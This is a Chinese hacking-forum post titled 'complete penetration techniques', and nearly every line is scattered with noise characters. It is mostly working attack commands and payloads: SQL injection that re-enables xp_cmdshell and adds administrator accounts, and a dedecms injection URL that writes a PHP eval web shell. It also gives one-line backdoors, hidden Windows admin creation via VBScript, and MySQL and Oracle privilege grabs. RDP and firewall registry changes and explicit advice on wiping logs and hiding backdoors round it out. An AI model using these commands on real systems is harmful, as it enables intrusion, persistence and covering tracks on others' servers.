找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4814|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1 e9 d! Y1 r7 K2 g; o( `9 z
1.net user administrator /passwordreq:no
% t, B% H2 h, U" c. ^. v. n这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
. l7 J" U6 m7 J9 U; |, x2.比较巧妙的建克隆号的步骤
& x! K' ^1 H# U5 a- B: T) }& W" V先建一个user的用户
1 {: j1 S( I1 _$ o1 Y, \; S然后导出注册表。然后在计算机管理里删掉# u% n8 H! `+ J8 Y, ]4 {* U
在导入,在添加为管理员组& p1 e! B/ ^+ ]
3.查radmin密码
9 P( J. o: n( z3 a8 _7 u5 vreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg# C! z! N* S( J0 @
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]* v. w% L, l! z( @# g
建立一个"services.exe"的项- M2 W( z: ?, ?6 V  h
再在其下面建立(字符串值)
* |3 I& ?- l. o7 l7 ~键值为mu ma的全路径
# N' d; y$ e( j1 Z5.runas /user:guest cmd
8 M& [7 M: P$ ]" I: u测试用户权限!' `% T8 ^- Q' }+ f% q1 m
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?( |9 \2 S' ?( X* a+ ^2 O+ M
7.入侵后漏洞修补、痕迹清理,后门置放:1 `( @3 `' |% l* E0 E9 W8 I
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
$ V$ h- h! ^8 E' V1 f8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
/ h0 D* }4 q8 R" H: b% M1 J* ?/ J
for example
, f/ _$ p; [0 t( V  J$ u
( g2 I; A: k" k. O7 J  Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
% E6 Q5 n+ O6 w8 D0 y: u: g# w; ]# k2 m; k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'7 {/ h9 H% S6 Q6 M9 m. L! k9 S) }

- e$ E0 p1 d- n5 @8 @9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
* u3 s% |) C/ T7 Q: q/ I) x0 Y) s! ^如果要启用的话就必须把他加到高级用户模式
% ?, ]" B" L$ _9 \8 p5 G2 G可以直接在注入点那里直接注入
1 X$ G4 d$ D% a. j. x& Jid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
( ]2 ]6 Y  M$ e; v) g6 |& g然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--3 h% g" s8 |7 N( z/ N. [; P, I
或者
0 _- m# W2 `/ s# u) D& ]sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
8 m, d  I5 i# L6 b& T$ ^" I8 A来恢复cmdshell。* K: c0 C6 w" {. d

/ F2 I9 E' X7 O, f6 H3 G8 r+ o+ H# y分析器
% o" {/ K* C: s( O1 M' dEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
9 Z2 r/ ~$ v! R2 Z: z7 W3 b2 H然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
9 d7 d# s% f; i" o4 Q0 o10.xp_cmdshell新的恢复办法7 [0 J6 F+ U, \+ k0 f
xp_cmdshell新的恢复办法7 \, d( S$ A& }4 R  F
扩展储存过程被删除以后可以有很简单的办法恢复:
2 s6 D" h9 l1 @) a$ u7 k, Y8 R, `删除
* k, H" E% s8 T; O2 ~drop procedure sp_addextendedproc
. F2 l7 p: j% \8 Y/ H: F+ Qdrop procedure sp_oacreate* l$ B2 ]3 p9 V# n" T! ~% h9 O# \0 x, x
exec sp_dropextendedproc 'xp_cmdshell'
2 C  v8 F6 \7 d
' o$ E& }8 k& v- ^9 E! y! g恢复( E: u' j) m6 Y$ e+ T
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 W3 O$ \$ O9 o4 T$ i/ Jdbcc addextendedproc ("xp_cmdshell","xplog70.dll"), I4 ~7 T! @8 R1 C  ~

  f# }. ^- a% a% T! B- D这样可以直接恢复,不用去管sp_addextendedproc是不是存在
9 u% h0 U, A0 Z
$ o+ i& ~. J+ ]3 l6 t; N2 C1 D-----------------------------
# i% Y: c" Z% M/ m8 V0 R. e
" H' J) r& L" T) V删除扩展存储过过程xp_cmdshell的语句:; v, ~9 `, [* ]/ s4 M( @$ C# G
exec sp_dropextendedproc 'xp_cmdshell'
* R: v2 J, D# x/ c/ \$ y# X4 F. ]' B- p. @  v- ]1 G6 I- u
恢复cmdshell的sql语句, O5 P6 @: c( r' Q+ i! [
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 ?6 }' f9 @) m

- E2 Z5 u) z& T( @+ x" E" V: n' k' R$ m0 r( M: V: ]- u
开启cmdshell的sql语句
, W; L5 X6 Y& \, D
2 w3 a; }- V* C8 H8 {; @exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'( B" i3 d1 i9 r
7 Y" F1 B# J9 i, W8 Y6 V
判断存储扩展是否存在3 I1 E; K5 S8 s
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
3 A, g3 y5 h" o' ?, h7 D; g返回结果为1就ok
# F* P+ V! j( H# A  Y1 w0 u/ C) e; |: u$ k. e8 W
恢复xp_cmdshell0 [1 X+ z6 J% s, a2 b' u
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
* k" M# A- W) v5 Z; h7 v/ w& ~返回结果为1就ok
" S. K8 H- R7 l  {5 h/ F% Y9 |
( B' d  x; ]+ [  K/ ^1 J  A; q否则上传xplog7.0.dll( q( Y) I$ Q. l/ ?
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
7 B! X. }. m* a& g- b9 m. j) {. M1 J. G, F2 @% `. t
堵上cmdshell的sql语句! f  s+ ]* v# z! k8 W
sp_dropextendedproc "xp_cmdshel
1 D9 e* m5 G9 l6 j1 ~6 ]% x-------------------------
$ V' a; d/ M" f/ V清除3389的登录记录用一条系统自带的命令:5 F+ h2 Z7 ?4 x3 T6 F
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f8 n* l7 V2 @' Z, Q2 Z8 g

" n/ J* c5 T# p然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& m) j1 ]; y, Z
在 mysql里查看当前用户的权限- z/ Z& v; o" c: x, N
show grants for  
4 A9 G$ V- u/ T; N% m' P5 n0 g. T; r4 C
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。) V- J- R( A) E5 w& ~) b1 ]

9 \( p( w9 Q8 l; s+ R
: V+ ^1 ]0 I# T. L8 c  lCreate USER 'itpro'@'%' IDENTIFIED BY '123';) |5 R; Q/ q9 q1 V* T4 \

$ G+ d% Y- J! d7 c' S+ MGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION0 L; B5 v$ z6 q' r( s, D: ]
, A5 B, h2 w/ P8 B8 j" P
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 09 H7 v  f, \9 T/ ]+ h4 d. p8 q
7 h0 O6 y. ~( A, Q
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 E; v( M3 w  P1 y, ?' R& @: L

: h% ]8 d! _5 i' q" N: [搞完事记得删除脚印哟。
! ?. I; r/ a1 i! `7 X
! b  C. }# {5 m1 gDrop USER 'itpro'@'%';" B' @- T: K- o5 A0 ?  {

, q( m( s* R+ X# `+ ^, w2 H! Q$ wDrop DATABASE IF EXISTS `itpro` ;) g6 J, {4 E  C% z0 a6 E3 z; C) C
% {: }' _4 p; R* M/ ~* w
当前用户获取system权限
& U# j( T2 k$ _7 hsc Create SuperCMD binPath= "cmd /K start" type= own type= interact( \( b$ h' D, w  I& E8 z' w
sc start SuperCMD/ D4 J7 k" O( ]( F( Z. B* \
程序代码
7 t& O" ~% D/ ^! }- h2 L( |( c<SCRIPT LANGUAGE="VBScript">8 i0 |3 q* d( }) @
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
9 Q+ \0 O) ?) w7 U* r% mos="WinNT://"&wsnetwork.ComputerName
6 N) |. V7 B4 z7 u: l  SSet ob=GetObject(os)
- U8 Y' C, f3 y' l+ lSet oe=GetObject(os&"/Administrators,group")
4 C" q2 D: Q5 }, X5 p8 f1 USet od=ob.Create("user","nosec")
8 m. A; v5 ~4 aod.SetPassword "123456abc!@#"; L4 S2 A4 ~( o
od.SetInfo' E: {) R# h2 c: g- d4 q
Set of=GetObject(os&"/nosec",user)
( A+ y9 H6 n2 Z1 loe.add os&"/nosec"
( C/ |+ `+ n9 i4 w1 p  c' `7 w/ V+ u</Script>
1 i% _7 w% |# z, k0 O<script language=javascript>window.close();</script>; a1 ^$ o5 T& p4 v1 F! F
. T# V) {3 S; d+ b- A) H6 u' N
9 R! X3 u) ?  s, a& Z$ R% B

. w0 M" _0 k! z. j9 [! V; t: E9 @  @  Z( n' V! j+ b  P. Q& G; a! b
突破验证码限制入后台拿shell
" v% y/ b9 e4 c3 Q" E# V* z程序代码
! `8 e' o) q  \REGEDIT4
( P% u& L2 j& h) V5 O2 K( h[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] * x/ m: K3 B; U3 m3 b) a
"BlockXBM"=dword:00000000
9 ?5 Y! }( `' ^* u9 G: K& i
( N* S9 o& t) ^1 X* P9 ]保存为code.reg,导入注册表,重器IE
" K/ q; E1 a$ H7 ^5 \就可以了6 x" w6 T$ a. b- W: L
union写马
. |# r' k! L/ S, P7 J  X程序代码
5 E3 w; x9 U. ^0 O3 Qwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*- w( Q5 ~2 S. u

9 M  d- \) f6 x- D1 h' J# o应用在dedecms注射漏洞上,无后台写马
2 p# R0 p6 Z. n3 P2 Ydedecms后台,无文件管理器,没有outfile权限的时候/ X6 U3 R: o! t6 U7 A
在插件管理-病毒扫描里% F8 W: W  E, H
写一句话进include/config_hand.php里! c. }& _4 @$ t
程序代码9 T7 L( J3 i2 s. f' L; V
>';?><?php @eval($_POST[cmd]);?>6 @' U- V$ U5 Y! y+ ]+ C( h: F
7 ]% a4 f4 H  J6 b7 N

/ }8 d& k  M1 j# e  q: ~如上格式
* B" P& p+ ~  |, e" B5 b2 O( n$ c" f- w* [
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
+ A2 w4 K# y1 P* a6 [1 m程序代码
3 B; m0 M2 O% J7 K; @* p4 Y9 Kselect username,password from dba_users;$ F& m# D. z: C: e2 l, \3 _2 [

  D, y0 W6 ]. Y  m+ l) z9 M: Q4 s3 O6 C; M
mysql远程连接用户
0 f+ M, X% {- I" ]" E  l, y: t程序代码
$ w3 G! w9 X0 p4 ^, ~. ~) M" l1 C1 N/ l. L7 ~$ W3 M3 Y! V
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';9 v9 G6 N2 \( J2 s2 u
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION  m/ q" ]& i' E& d- j, ~
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 08 s) N) v8 \1 f2 o. T
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 D5 I+ S; M- R9 E
5 j$ Z& {$ m! i1 E* E, d

* x6 O0 t- ]0 V7 C, c' U6 |6 y
( p9 L; _1 U4 v9 V+ u8 I3 S0 E
% R5 a5 r$ X4 @! yecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
8 X+ N' f/ T1 z! O8 I# F8 |% P8 T+ G( V- E; `3 b, D/ F
1.查询终端端口
2 C* {$ d1 N3 {# a- Z  u6 R
# \, C! X/ g, Dxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
8 o2 Z1 S! A9 G7 P- s( c0 `8 \4 ?, v1 W( X/ q  \$ \, K4 }
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
% j' o4 F6 L2 ?* Y  \, ]- Vtype tsp.reg
& K: Q# k+ v8 S! U
& W' {9 W! `% `" Z# |% |/ A2.开启XP&2003终端服务
" p% @+ `% k! L* h- I9 w8 Q1 M- P! R- c; F- w9 b8 K) V

# N: H. ~2 ^% eREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
; `, y: [* r6 T7 h3 D: ]8 D
( r) \4 w2 B$ e3 w( c( U+ b! `! I1 W8 t( F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3 |, `/ y$ R7 W

4 |8 g, X0 b5 Y/ t2 i; S1 S0 h3.更改终端端口为20008(0x4E28)
. O5 G1 S7 f( y0 w: Q! [! p1 `! R. U* l$ S9 z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f& v/ |- A  n+ ]% D; `, W0 [: O, ]. {

( X7 L. d! B; Z$ ?& C% W! E9 pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: l) {+ J! Z$ {. g/ }7 M+ f5 x2 x3 |: x1 @: o; j9 D. P
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制, n4 @# }$ n8 ^: e6 I' l
) m: a6 ]9 i; ^2 G6 l- U. ^1 U
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f! M8 f* `8 m! T3 |6 V% P% M  v

) ^1 i- t: E7 S8 g& l" A
1 u/ l, s( v2 d4 Q. ?( Z5.开启Win2000的终端,端口为3389(需重启)8 f/ c/ e! ]! b1 ~+ L  \9 W

- m# Z0 L  J* m6 V, y6 I/ Oecho Windows Registry Editor Version 5.00 >2000.reg & t, a" [* I9 e' |3 P% H
echo. >>2000.reg
+ L2 d3 G' `  \. Z2 u, qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
& q1 G! z/ o4 E% decho "Enabled"="0" >>2000.reg
" `( U# l$ Y( Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 6 h( N  d3 s5 P
echo "ShutdownWithoutLogon"="0" >>2000.reg 0 s4 Z" e  A" n+ _0 Z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
! R2 o+ m2 w2 U$ w# B/ z5 g" uecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
* M6 v* P6 M1 ]: A* Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 7 m: k7 i! I" L, d, _
echo "TSEnabled"=dword:00000001 >>2000.reg * j, ]3 P1 D( T6 i1 u3 s: E  B, W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg . _2 G# p( T0 w$ I& @
echo "Start"=dword:00000002 >>2000.reg
  Z( h+ O) d) s; Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg $ s7 B; G8 c0 A2 k0 y+ R
echo "Start"=dword:00000002 >>2000.reg / \& f4 `& k8 b5 a, d
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg : k8 h) R% I) C* S
echo "Hotkey"="1" >>2000.reg
1 Z. w$ y7 V; d" J* T) \) Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
7 S! x; J+ ~0 z) i) U0 Techo "ortNumber"=dword:00000D3D >>2000.reg
2 B2 D0 L% R  u# T' Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ! I: V5 e; U) U3 \! u
echo "ortNumber"=dword:00000D3D >>2000.reg/ [& s+ M. S, \6 y

$ f$ [' n) n/ x+ D2 C& T6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
6 [) n6 d/ d6 I" ?/ T& i' i# i4 V( W0 Z) g+ V
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
8 W% [3 t5 J: a! @(set inf=InstallHinfSection DefaultInstall)
) z: `9 y0 g% H% e) x: cecho signature=$chicago$ >> restart.inf
- `$ d! ^, ]& B1 _* I, [echo [defaultinstall] >> restart.inf  u+ P+ a+ x, G' t
rundll32 setupapi,%inf% 1 %temp%\restart.inf
2 G  u* |6 X7 e; P" u( B- q0 O, `' ?3 U! j4 _4 \0 n7 S6 K* A

. J' F5 C) O7 H* `7.禁用TCP/IP端口筛选 (需重启)( T8 J; @2 U3 x1 g/ O

& R; d2 ~& i* l$ GREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
' ]3 _9 d7 r% T5 R9 V2 h3 R! D/ o# U* `) S3 s) g
8.终端超出最大连接数时可用下面的命令来连接
4 V( E1 l4 A$ d$ {( m4 ^6 }9 w% n5 W
; i  ~) v% o5 L/ ^; L! Wmstsc /v:ip:3389 /console" J2 F( H: i' L2 T2 ?* @% `8 R! i+ ]

# r4 X  k  Y) T7 M+ N1 b9.调整NTFS分区权限; q. J$ K, D* a4 }8 U, w$ p9 G- p, R& m1 W

0 E' M6 A. |6 _! v4 ~cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)- X- V5 ~8 {, m: V: Z' P9 `

7 V7 F4 K! b: ~4 z; qcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件); J+ O$ P, x$ w: r2 @! w: l9 u

% }, B& B4 c+ g4 f; r3 _0 m------------------------------------------------------2 u9 Y' u7 l1 z  g3 q+ ]- b6 n; x2 J) u
3389.vbs - E# g% W! P  d% ^6 [
On Error Resume Next
& D7 o, J& n$ Y5 a- W, I4 q+ bconst HKEY_LOCAL_MACHINE = &H80000002
- E7 p7 O9 Y3 u* R; ^2 D! BstrComputer = "."6 n! _% b2 N6 e/ v6 i; C$ x
Set StdOut = WScript.StdOut* |$ B. l$ j! i" G4 D$ _
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
( E3 k% f% r; @; m2 t, u4 u3 w7 RstrComputer & "\root\default:StdRegProv")
0 W4 A$ E" V7 M  @- lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
; @; M! A: a8 [$ J, u1 T% Noreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  C! u6 e) R. x. T% d: I' v8 f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"( I( o. M) I" `. t: e
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
6 `1 z$ i6 ~2 O7 _strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" Q! `3 U1 L6 q. w( Z- ~4 \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
9 `# V8 q. \+ @" }$ M2 b( Y8 AstrValueName = "fDenyTSConnections"5 _7 T6 U4 j+ }) W0 U, \. N
dwValue = 0
  e/ P1 t+ `& i1 K+ }oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* c% o: k* Q/ f4 w5 C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 s4 [1 ^: S8 f5 V3 Q5 d6 l4 n
strValueName = "ortNumber"
- u& o5 z! _8 h& J9 }) ^dwValue = 3389
5 @, R" k! J$ K, Z( g/ eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# \5 X/ k  y- C6 \; B) V" R6 t( I0 zstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"7 x5 R" M, [  F
strValueName = "ortNumber"
: a! _: E/ k! x& Z$ H: m- N& {dwValue = 33893 p2 U& i: ?: z. g$ S+ ^/ O
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" M, p# A% z( p+ x. ISet R = CreateObject("WScript.Shell") ! I+ |; [/ P8 c
R.run("Shutdown.exe -f -r -t 0") : e0 ~+ q( i, Z$ L

2 i( _3 K, u6 R删除awgina.dll的注册表键值
& Y* x% y. [. q1 o  _# X程序代码3 ^( e1 b8 y: u: V* d  D. O
# A# F/ u, v( U! d
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
. X9 r" B0 H% `+ v: _: y) C% {; h7 I9 z8 s! `7 M' J! S# ^0 R, q' d% J
6 @' ?# B: m# L
+ P5 [8 g% M6 I6 j0 x; v6 r

, U% x6 w7 K2 b. U# r程序代码- l- ^' J* K; J( V
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
; _1 _2 P6 s$ T0 G% [+ V5 j1 l+ ?2 @) f- Q0 e1 m7 f. `
设置为1,关闭LM Hash$ R) B8 \( W5 X
+ g7 \. I3 U- n0 h8 j7 @+ K
数据库安全:入侵Oracle数据库常用操作命令! F0 x. q. [2 Y5 T1 k
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。: Z7 \8 g$ i' I
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
# z+ j( f/ m! [  C2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;9 y3 Q/ u; }, k- V: D) X7 `
3、SQL>connect / as sysdba ;(as sysoper)或
+ l# u- _, I; {/ q* B' C' l- ~  zconnect internal/oracle AS SYSDBA ;(scott/tiger)) V. d# M1 O+ C4 `6 P  E: B6 C% K4 M- J
conn sys/change_on_install as sysdba;
% U% v  G7 {1 x9 ?* W. a! D4、SQL>startup; 启动数据库实例1 i' r% q$ L, ?! w% s4 h8 G
5、查看当前的所有数据库: select * from v$database;
# [* b) @& g0 f( ^* |select name from v$database;
% ~4 {/ i& B5 H! j4 @) C6、desc v$databases; 查看数据库结构字段
" a# ~4 q  W' E6 T5 s% ?$ F5 K7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
% w: }+ r9 d3 a; H: OSQL>select * from V_$PWFILE_USERS;
1 ~2 ]6 v8 \: S6 L3 }4 r, P( U/ a/ JShow user;查看当前数据库连接用户
  N, w' I- T; z8、进入test数据库:database test;
) S  N% y  Q4 m# G& U9、查看所有的数据库实例:select * from v$instance;  ]4 \$ ~+ h  W7 w" X, y
如:ora9i
. v* F1 t3 p( _6 e3 K" j4 [10、查看当前库的所有数据表:
; E2 e5 T) ?" TSQL> select TABLE_NAME from all_tables;
4 P) D# V6 v7 L% X! I* tselect * from all_tables;
! j1 C, B3 E* }' MSQL> select table_name from all_tables where table_name like '%u%';
6 V  ?' [1 ?" L. j* l' UTABLE_NAME+ ]7 ]  x8 ~# c
------------------------------
9 [! k$ ?& j# g% T: ^8 N_default_auditing_options_
! D! T% O. y( p2 J) X4 m1 Z3 V/ M2 F! P11、查看表结构:desc all_tables;/ _# D# |' n3 G2 P6 _5 I
12、显示CQI.T_BBS_XUSER的所有字段结构:
6 H3 C4 O/ ^* ^" T' y' E) ndesc CQI.T_BBS_XUSER;
- N7 S" e3 O. |& v13、获得CQI.T_BBS_XUSER表中的记录:- B' \) x8 Z0 R6 P
select * from CQI.T_BBS_XUSER;
% p7 W/ ^/ K* \1 H14、增加数据库用户:(test11/test); A! v- [8 U( @( t3 D# H/ C" N
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
! c9 c* @. y& P2 P& H! U. @; d6 Y/ I15、用户授权:5 V" I6 h' g  B2 `0 G9 t
grant connect,resource,dba to test11;# R) R: l8 l. v
grant sysdba to test11;
6 Y' n: R  ]! w% L9 A0 Gcommit;
3 k* \$ x6 ?! L- S16、更改数据库用户的密码:(将sys与system的密码改为test.)
4 |" n4 s% Z3 D3 P: j) I) A- S) Zalter user sys indentified by test;
9 g* q6 g. w2 a! Talter user system indentified by test;; L3 }6 G* y, E+ G$ F
7 H4 }- x* z& o' U
applicationContext-util.xml
5 g8 D! ]( l4 d; c- @! ~. b& UapplicationContext.xml
- ~' s6 W/ A0 x( tstruts-config.xml
, s3 n1 y5 _" M6 ~+ m' n# V  uweb.xml
0 ]" f8 g/ j% q" ]3 fserver.xml
  S, D, K$ d/ d; f: n: i( P9 g# S. Ktomcat-users.xml# N2 ?- M7 j% Y. p! c, i8 C
hibernate.cfg.xml8 v/ S+ Q- V+ s- z* c  K
database_pool_config.xml
& G: q0 f5 B. b4 Z2 g* |+ h+ R: W

9 R+ i3 m  n3 }& S' |! d$ u\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置1 j2 {) m& P# M: d& l5 Z! C
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
3 Y2 V8 W* q' o5 h\WEB-INF\struts-config.xml  文件目录结构2 l. e, y  _2 U6 L
: k6 V1 j6 N: E" j! t& E
spring.properties 里边包含hibernate.cfg.xml的名称
* A9 U8 f6 ]7 O9 a, A$ B1 @+ x# r
- ~4 C0 M) }! s( z+ @
2 l3 f, x; x; b" p$ OC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml5 H: R; c+ V& \

# X3 e# _$ A' u% ^8 B2 Q如果都找不到  那就看看class文件吧。。
# {$ v/ J3 B+ J* F
# A4 X. B( _7 G5 C) s' a5 _测试1:
/ q7 e% X% S$ U$ u6 d) Q0 C- rSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t14 `7 M7 K& P1 c2 T
; o2 ~# z6 ~* l) r7 z  x7 Y. D
测试2:
* f% E- x* V" u9 W2 y& W- ^% g) [1 f. V9 a# @
create table dirs(paths varchar(100),paths1 varchar(100), id int)
0 c. K1 n( ^$ n' w0 l
3 G5 m6 e7 t; \$ J( v7 H/ Pdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--7 R( J4 h3 ~& L5 L3 Z

- _+ e* o8 Q0 [% ESELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
& ^1 x8 D7 T. A: q6 ]/ O, N, q2 t: @( \* j+ _* ~, R! u5 t/ w# e
查看虚拟机中的共享文件:
5 ~4 }. V7 u' G: E9 Z5 k8 Z/ d在虚拟机中的cmd中执行
& B6 m, o9 j& e" s1 ~; i\\.host\Shared Folders$ _* t; c4 w1 c' ]- C: I
$ e# |) t+ h6 R) j, t* `
cmdshell下找终端的技巧
: X9 ^# Y% y8 |9 [0 {1 }找终端: $ b4 c: a* J/ ^
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! & P0 Q4 _7 V; ]) h& m6 S
